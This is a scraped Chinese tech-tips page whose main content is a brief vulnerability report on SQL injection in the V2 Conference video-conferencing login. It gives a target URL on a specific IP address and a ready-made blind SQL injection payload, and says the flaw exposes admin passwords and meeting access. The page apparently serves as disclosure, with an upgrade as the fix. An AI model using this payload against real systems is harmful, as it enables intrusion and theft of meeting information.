 |
|||||||||||||
电脑知识: 基础知识 网络技术 操作系统 办公软件 电脑维修 电脑安全 windows7 windows8 windows10 服务器教程 平板电脑 视频播放教程 网络应用 互联网 工具软件 浏览器教程 QQ技巧 输入法教程 影视制作 YY教程 wps教程 word教程 Excel教程 PowerPoint
云南西双版纳特产小花糯玉米真空包装金山毒霸精确打击潜伏病毒
金山毒霸如何暂停杀软威胁提示 畅玩游戏杜绝打扰
巧借金山毒霸文件粉碎去除顽疾立竿见影
金山毒霸常见问题解答
金山毒霸一键揪出风险进程 快速解决系统问题
金山毒霸清理专家功能使用教程
金山毒霸网购保镖功能
金山毒霸防御监控使用教程
win10网络设置没有wlan选项如何解决
金山毒霸使用教程之安全百宝箱
绿盟视频会议系统SQL注入
【 来源:网络 】【 点击:1 】 【 发布时间:2017_03_03 08:59:59 】
通过注入能够拿到管理账户密码,然后登录后台查看会议密码,通过会议密码能够进入到远程会议中,恶意攻击者能够窃取某些敏感信息。
http://211.151.49.196:18080/V2Conf/jsp/user/loginAction.do
其实是V2 Conference视频会议系统较低版本的SQL注入,注入发生在登录时用户名的输入框内,使用以下注入语句可测试:
1' or (select benchmark(300000,md5(user())) from users where substring(username,1,5)='admin')#
修复方案:
升级补丁